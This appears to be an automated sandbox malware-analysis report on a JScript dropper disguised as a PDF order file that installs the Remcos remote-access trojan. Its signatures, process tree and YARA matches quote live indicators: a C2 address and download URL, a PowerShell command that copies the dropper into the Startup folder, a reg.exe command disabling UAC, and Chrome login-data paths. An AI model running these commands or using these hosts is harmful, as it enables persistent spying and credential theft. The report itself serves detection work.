Windows Analysis Report
Order Specifications PDF.js

Overview

General Information

Sample Name: Order Specifications PDF.js
Analysis ID: 737570
MD5: 2f2dd87407ef0c27a76906745df56ec0
SHA1: cec4a6dd3d0fa67524e93b1f8906ff5c15bf7f22
SHA256: c074cae77f4adf2af92380ce03345d6abaf16ea5442690f18574429ce2538958
Tags: js RemcosRAT

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Copy file to startup via Powershell
Multi AV Scanner detection for submitted file
JScript performs obfuscated calls to suspicious functions
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Remcos RAT
Sigma detected: Remcos
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
JavaScript source code contains functionality to generate code involving a shell, file or stream
Drops PE files to the startup folder
Writes to foreign memory regions
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Powershell drops PE file
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
Deletes itself after installation
Potential obfuscated javascript found
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • wscript.exe (PID: 5252 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Specifications PDF.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • VNZVNCXKKJSF.exe (PID: 5516 cmdline: "C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe" MD5: 5ED905205AEB85AF64B2FF567A8CF838)
      • powershell.exe (PID: 5224 cmdline: "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • RegSvcs.exe (PID: 480 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • Systedbddfm.exe (PID: 820 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe" MD5: 5ED905205AEB85AF64B2FF567A8CF838)
    • powershell.exe (PID: 3712 cmdline: "Powershell" Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 2032 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup
{"Host:Port:Password": "51.75.209.245:2404:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-CMFPLR", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}
Source | Rule | Description | Author | Strings
0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
    0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
    • 0x66a28:$a1: Remcos restarted by watchdog!
    • 0x66f80:$a3: %02i:%02i:%02i:%03i
    • 0x67305:$a4: * Remcos v
    0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
      0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
        0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
        • 0xdd518:$a1: Remcos restarted by watchdog!
        • 0x152b78:$a1: Remcos restarted by watchdog!
        • 0xdda70:$a3: %02i:%02i:%02i:%03i
        • 0x1530d0:$a3: %02i:%02i:%02i:%03i
        • 0xdddf5:$a4: * Remcos v
        • 0x153455:$a4: * Remcos v
        Source | Rule | Description | Author | Strings
        13.0.RegSvcs.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
          13.0.RegSvcs.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | detects Windows exceutables potentially bypassing UAC using eventvwr.exe | ditekSHen
          • 0x61900:$s1: \Classes\mscfile\shell\open\command
          • 0x61960:$s1: \Classes\mscfile\shell\open\command
          • 0x61948:$s2: eventvwr.exe
          13.0.RegSvcs.exe.400000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
          • 0x679e0:$a1: Remcos restarted by watchdog!
          • 0x67f38:$a3: %02i:%02i:%02i:%03i
          • 0x682bd:$a4: * Remcos v
          13.0.RegSvcs.exe.400000.0.unpack | REMCOS_RAT_variants | unknown | unknown
          • 0x629e4:$str_a1: C:\Windows\System32\cmd.exe
          • 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x61a0c:$str_b2: Executing file:
          • 0x62b28:$str_b3: GetDirectListeningPort
          • 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x62630:$str_b7: \update.vbs
          • 0x61a34:$str_b9: Downloaded file:
          • 0x61a20:$str_b10: Downloading file:
          • 0x61ac4:$str_b12: Failed to upload file:
          • 0x62af0:$str_b13: StartForward
          • 0x62b10:$str_b14: StopForward
          • 0x625d8:$str_b15: fso.DeleteFile "
          • 0x6256c:$str_b16: On Error Resume Next
          • 0x62608:$str_b17: fso.DeleteFolder "
          • 0x61ab4:$str_b18: Uploaded file:
          • 0x61a74:$str_b19: Unable to delete:
          • 0x625a0:$str_b20: while fso.FileExists("
          • 0x61f49:$str_c0: [Firefox StoredLogins not found]
          10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

            Persistence and Installation Behavior

            Source: Process started, Author: Joe Security, Data: Command: "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe', CommandLine: "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe', CommandLine|base64offset|contains: r^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe, ParentProcessId: 5516, ParentProcessName: VNZVNCXKKJSF.exe, ProcessCommandLine: "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe', ProcessId: 5224, ProcessName: powershell.exe

            Stealing of Sensitive Information

            Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 480, TargetFilename: C:\ProgramData\remcos\logs.dat
            Timestamp: 11/03/22-23:35:55.641128
            Source IP: 192.168.2.6
            Destination IP: 8.8.8.8
            SID: 2012811
            Source Port: 58595
            Destination Port: 53
            Protocol: UDP
            Classtype: Potentially Bad Traffic

            AV Detection

            Source: Order Specifications PDF.js, ReversingLabs: Detection: 26%
            Source: Order Specifications PDF.js, Virustotal: Detection: 25%
            Source: Yara match, File source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000014.00000002.700880985.0000000001457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: VNZVNCXKKJSF.exe PID: 5516, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 480, type: MEMORYSTR
            Source: https://tgc8x.tk/tt/VNZVNCXKKJSF.exepo, Avira URL Cloud: Label: phishing
            Source: https://tgc8x.tk/tt/VNZVNCXKKJSF.exe, Avira URL Cloud: Label: malware
            Source: https://tgc8x.tk/tt/VNZVNCXKKJSF.exei_g, Avira URL Cloud: Label: phishing
            Source: tgc8x.tk, Virustotal: Detection: 5%
            Source: https://tgc8x.tk/tt/VNZVNCXKKJSF.exe, Virustotal: Detection: 13%
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe, Avira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe, Avira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exe, Avira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exe, ReversingLabs: Detection: 65%
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe, ReversingLabs: Detection: 65%
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe, ReversingLabs: Detection: 65%
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe, Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe, Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exe, Joe Sandbox ML: detected
            Source: 13.0.RegSvcs.exe.400000.0.unpack, Avira: Label: BDS/Backdoor.Gen
            Source: 10.0.VNZVNCXKKJSF.exe.540000.0.unpack, Avira: Label: TR/Dropper.Gen
            Source: 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "51.75.209.245:2404:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-CMFPLR", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}
            Source: VNZVNCXKKJSF.exe, 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----
            Source: unknown, HTTPS traffic detected: 50.115.174.192:443 -> 192.168.2.6:49710 version: TLS 1.2
            Source: Binary string: RuDl.pdb source: VNZVNCXKKJSF.exe, 0000000A.00000002.414602354.0000000002920000.00000004.08000000.00040000.00000000.sdmp, VNZVNCXKKJSF.exe, 0000000A.00000002.414888406.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Systedbddfm.exe, 00000011.00000002.707496328.0000000002C50000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\VNZVNCXKKJSF.pdbBSJB source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\VNZVNCXKKJSF.pdb source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr

            Software Vulnerabilities

            barindex
            Source: Order Specifications PDF.jsReturn value : ['uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsArgument value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"Scripting.FileSystemObject","m*X5"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsArgument value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
